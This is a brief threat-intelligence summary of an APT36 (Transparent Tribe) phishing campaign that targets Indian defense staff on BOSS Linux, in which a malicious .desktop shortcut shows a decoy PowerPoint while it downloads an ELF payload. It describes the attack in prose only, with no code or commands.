The Reveal Platform
Intel Name: Phishing attack: deploying malware on indian defense boss linux
Date of Scan: July 7, 2025
Impact: High
Summary: Our team uncovered a cyber-espionage campaign by APT36 (Transparent Tribe), targeting Indian defense personnel. In a tactical shift, the group now focuses on Linux systems, especially BOSS Linux used by Indian government agencies. Phishing emails deliver a ZIP file containing a malicious .desktop shortcut that executes on user interaction. It opens a decoy PowerPoint file while silently downloading and running a malicious ELF payload to compromise the system.
